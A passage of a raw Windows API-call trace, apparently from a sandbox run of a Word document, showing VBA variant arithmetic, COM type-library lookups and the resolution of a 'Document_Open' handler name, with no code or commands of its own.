pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0071.810] VarCmp (pvarLeft=0xaeff920, pvarRight=0xaeff908, lcid=0x0, dwFlags=0x30001) returned 0x1 [0071.810] VarMul (in: pvarLeft=0xaf00000, pvarRight=0xaeff8f0, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0071.810] sqrt (_X=0x3) returned 0x4180000000000000 [0071.810] VarDiv (in: pvarLeft=0xaeff8c0, pvarRight=0xaf00000, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0071.810] VarDiv (in: pvarLeft=0xaf00030, pvarRight=0xaefffb8, pvarResult=0xaefffa0 | out: pvarResult=0xaefffa0) returned 0x0 [0071.810] RtlUnwindEx (TargetFrame=0x1467c0, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x1468d0, ContextRecord=0x146230, HistoryTable=0x0) [0071.810] VarMul (in: pvarLeft=0xaf00000, pvarRight=0xaeff848, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0071.810] VarCmp (pvarLeft=0xaeff818, pvarRight=0xaeff800, lcid=0x0, dwFlags=0x30001) returned 0x1 [0071.811] VarMul (in: pvarLeft=0xaf00000, pvarRight=0xaeff7e8, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0071.811] sqrt (_X=0x3) returned 0x41c0000000000000 [0071.811] VarDiv (in: pvarLeft=0xaeff7b8, pvarRight=0xaf00000, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0071.811] VarDiv (in: pvarLeft=0xaf00030, pvarRight=0xaefffb8, pvarResult=0xaefffa0 | out: pvarResult=0xaefffa0) returned 0x0 [0071.811] RtlUnwindEx (TargetFrame=0x1467c0, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x1468d0, ContextRecord=0x146230, HistoryTable=0x0) [0071.811] VarMul (in: pvarLeft=0xaf00000, pvarRight=0xaeff740, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0071.832] IMalloc:Free (This=0x7fefec05380, pv=0x68debe0) [0071.834] ITypeInfo:RemoteGetDocumentation (in: This=0x695ca20, memid=5, refPtrFlags=0x147600, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0071.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Open", cchWideChar=5, lpMultiByteStr=0x147650, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Open", lpUsedDefaultChar=0x0) returned 5 [0071.834] _mbscpy_s (in: _Dst=0x1474a0, _DstSizeInBytes=0xe, _Src=0x42b2b3e | out: _Dst=0x1474a0) returned 0x0 [0071.834] _mbscpy_s (in: _Dst=0x1474a9, _DstSizeInBytes=0x5, _Src=0x147650 | out: _Dst=0x1474a9) returned 0x0 [0071.834] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document_Open") returned 0x1089c1 [0071.834] IUnknown:QueryInterface (in: This=0x695c970, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147008 | out: ppvObject=0x147008*=0x0) returned 0x80004002 [0071.834] IUnknown:Release (This=0x695ca20) returned 0x3 [0071.834] IUnknown:QueryInterface (in: This=0x695ca20, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147008 | out: ppvObject=0x147008*=0x0) returned 0x80004002 [0071.834] IUnknown:Release (This=0x695c8c0) returned 0x1 [0071.834] IUnknown:QueryInterface (in: This=0x695c8c0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147008 | out: ppvObject=0x147008*=0x0) returned 0x80004002 [0071.834] IUnknown:QueryInterface (in: This=0x695c970, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147008 | out: ppvObject=0x147008*=0x0) returned 0x80004002 [0071.834] IUnknown:QueryInterface (in: This=0x695ca20, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147008 | out: ppvObject=0x147008*=0x0) returned 0x80004002 [0071.834] IUnknown:QueryInterface (in: This=0x695c8c0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x147008 | out: ppvObject=0x147008*=0x0) returned 0x80004002 [0071.835] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0071.835] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0071.835] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x146538, pDummy=0x0 | out: ppTLibAttr=0x146538, pDummy=0x0) returned 0x0 [0071.835] ITypeLib:RemoteGetDocumentation (in: This=0x665ba50, index=-1, refPtrFlags=0x146550, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0071.835] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x412) returned 0x3f5c1a0 [0071.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchWideChar=66, lpMultiByteStr=0x1465c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", lpUsedDefaultChar=0x0) returned 66 [0071.835] strcpy_s (in: _Dst=0x6a18880, _DstSize=0x43, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0071.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x1466d0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0071.835] strcpy_s (in: _Dst=0x6a188d0, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0071.835] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x412) returned 0x69fccf0 [0071.835] IUnknown:AddRef (This=0x665ba50) returned 0x11 [0071.835] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0071.835] IUnknown:Release (This=0x665ba50) returned 0x10 [0071.835] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 5 [0071.836] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0071.836] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0071.836] ITypeLib:RemoteGetLibAttr (in: This=0x631b4c0, ppTLibAttr=0x146538, pDummy=0x0 | out: ppTLibAttr=0x146538, pDummy=0x0) returned 0x0 [0071.836] ITypeLib:RemoteGetDocumentation (in: This=0x631b4c0, index=-1, refPtrFlags=0x146550, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0071.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x1465c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLBVBE7.DLL", lpUsedDefaultChar=0x0) returned 58 [0071.836] strcpy_s (in: _Dst=0x6a18940, _DstSize=0x3b, _Src="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Dst="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0071.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x1466d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0071.836] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0xafdbf10 [0071.836] strcpy_s (in: _Dst=0xafdbf38, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0071.836] IUnknown:AddRef (This=0x631b4c0) returned 0xd [0071.836] ITypeLib:LocalReleaseTLibAttr (This=0x631b4c0) returned 0x0 [0071.836] IUnknown:Release (This=0x631b4c0) returned 0xc [0071.836] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned -50 [0071.837] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -5 [0071.837] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0 [0071.837] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0071.837] ITypeLib:RemoteGetLibAttr (in: This=0x665bd20, ppTLibAttr=0x146538, pDummy=0x0 | out: ppTLibAttr=0x146538, pDummy=0x0) returned 0x0 [0071.837] ITypeLib:RemoteGetDocumentation (in: This=0x665bd20, index=-1, refPtrFlags=0x146550, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0071.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchWideChar=31, lpMultiByteStr=0x1465c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\stdole2.tlbce\\Root\\Office16\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 31 [0071.837] strcpy_s (in: _Dst=0xafdbfa8, _DstSize=0x20, _Src="C:\\Windows\\system32\\stdole2.tlb" | out: _Dst="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0071.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x1466d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0071.837] strcpy_s (in: _Dst=0xafdbfd0, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0071.837] IUnknown:AddRef (This=0x665bd20) returned 0x8 [0071.837] ITypeLib:LocalReleaseTLibAttr (This=0x665bd20) returned 0x0 [0071.837] IUnknown:Release (This=0x665bd20) returned 0x7 [0071.838] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 2 [0071.838] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 2 [0071.838] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 2 [0071.838] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0 [0071.839] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0071.839] ITypeLib:RemoteGetLibAttr (in: This=0x665b4b0, ppTLibAttr=0x146538, pDummy=0x0 | out: ppTLibAttr=0x146538, pDummy=0x0) returned 0x0 [0071.839] ITypeLib:RemoteGetDocumentation (in: This=0x665b4b0, index=-1, refPtrFlags=0x146550, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0071.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=63, lpMultiByteStr=0x1465c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLLDLL", lpUsedDefaultChar=0x0) returned 63 [0071.839] strcpy_s (in: _Dst=0xafdc040, _DstSize=0x40, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0071.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x1466d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0071.839] strcpy_s (in: _Dst=0xafdc088, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0071.839] IUnknown:AddRef (This=0x665b4b0) returned 0x6 [0071.839] ITypeLib:LocalReleaseTLibAttr (This=0x665b4b0) returned 0x0 [0071.839] IUnknown:Release (This=0x665b4b0) returned 0x5 [0071.839] IUnknown:QueryInterface (in: This=0x695c970, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x146180 | out: ppvObject=0x146180*=0x0) returned 0x80004002 [0071.839] IUnknown:AddRef (This=0x695c970) returned 0x3 [0071.839] ITypeInfo:RemoteGetTypeAttr (in: This=0x695c970, ppTypeAttr=0x146198, pDummy=0x10 | out: ppTypeAttr=0x146198, pDummy=0x10) returned 0x0 [0071.839] ITypeInfo:LocalReleaseTypeAttr (This=0x695c970) returned 0x0 [0071.839] IUnknown:Release (This=0x695c970) returned 0x2 [0071.839] IUnknown:Release (This=0x695c970) returned 0x1 [0071.839] IMalloc:Alloc (This=0x7fefec05380, cb=0x118) returned 0x6958fa0 [0071.839] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0xafdc160 [0071.839] IMalloc:Alloc (This=0x7fefec05380, cb=0xe28) returned 0xb003a10 [0071.839] ITypeInfo:RemoteGetTypeAttr (in: This=0x695ca20, ppTypeAttr=0x146178, pDummy=0x1461b4 | out: ppTypeAttr=0x146178, pDummy=0x1461b4*=0xffffffff) returned 0x0 [0071.839] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x0, ppFuncDesc=0x146170, pDummy=0x1461b8 | out: ppFuncDesc=0x146170, pDummy=0x1461b8*=0x695ca20) returned 0x0 [0071.839] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.839] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x1, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.839] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x2, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x3, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x4, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x5, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x6, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x7, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x8, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x9, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0xa, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0xb, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0xc, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:LocalReleaseTypeAttr (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetTypeAttr (in: This=0x695ca20, ppTypeAttr=0x146178, pDummy=0x1461b4 | out: ppTypeAttr=0x146178, pDummy=0x1461b4*=0xffffffff) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x0, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x1, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x2, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x3, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.840] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x4, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.840] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.841] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x5, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.841] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.841] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x6, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.841] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.841] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x7, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.841] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.841] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x8, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.841] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.841] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0x9, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.841] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.841] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0xa, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.841] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.841] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0xb, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.841] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.841] ITypeInfo:RemoteGetFuncDesc (in: This=0x695ca20, index=0xc, ppFuncDesc=0x146170, pDummy=0xf0 | out: ppFuncDesc=0x146170, pDummy=0xf0) returned 0x0 [0071.841] ITypeInfo:LocalReleaseFuncDesc (This=0x695ca20) returned 0x0 [0071.841] ITypeInfo:LocalReleaseTypeAttr (This=0x695ca20) returned 0x0 [0071.841] IUnknown:Release (This=0x695ca20) returned 0x3 [0071.841] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c4300 [0071.841] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c3ce0 [0071.841] IUnknown:QueryInterface (in: This=0x695ca20, riid=0x7fee3b30b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x145a88 | out: ppvObject=0x145a88*=0x0) returned 0x80004002 [0071.841] ITypeInfo:RemoteGetTypeAttr (in: This=0x695ca20, ppTypeAttr=0x145a80, pDummy=0x10 | out: ppTypeAttr=0x145a80, pDummy=0x10) returned 0x0 [0071.841] IUnknown:QueryInterface (in: This=0x695ca20, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1459f8 | out: ppvObject=0x1459f8*=0x0) returned 0x80004002 [0071.841] IUnknown:AddRef (This=0x695ca20) returned 0x4 [0071.841] ITypeInfo:RemoteGetTypeAttr (in: This=0x695ca20, ppTypeAttr=0x1459f0, pDummy=0x10 | out: ppTypeAttr=0x1459f0, pDummy=0x10) returned 0x0 [0071.841] ITypeInfo:LocalReleaseTypeAttr (This=0x695ca20) returned 0x0 [0071.841] IUnknown:Release (This=0x695ca20) returned 0x3 [0071.841] strcpy_s (in: _Dst=0xafdc1b8, _DstSize=0x9, _Src="Document" | out: _Dst="Document") returned 0x0 [0071.841] IMalloc:Alloc (This=0x7fefec05380, cb=0xc8) returned 0xafec870 [0071.842] ITypeInfo:RemoteGetTypeAttr (in: This=0x695ca20, ppTypeAttr=0x1459b0, pDummy=0x695ca20 | out: ppTypeAttr=0x1459b0, pDummy=0x695ca20*=0xfd5207b0) returned 0x0 [0071.842] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x695ca20, ppTLib=0x1459b8, pIndex=0x1459f8 | out: ppTLib=0x1459b8*=0x631b4c0, pIndex=0x1459f8*=0x20e) returned 0x0 [0071.842] ITypeLib:RemoteGetLibAttr (in: This=0x631b4c0, ppTLibAttr=0x1456a8, pDummy=0x0 | out: ppTLibAttr=0x1456a8, pDummy=0x0) returned 0x0 [0071.842] ITypeLib:RemoteGetDocumentation (in: This=0x631b4c0, index=-1, refPtrFlags=0x1456c0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1) returned 0x0 [0071.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft 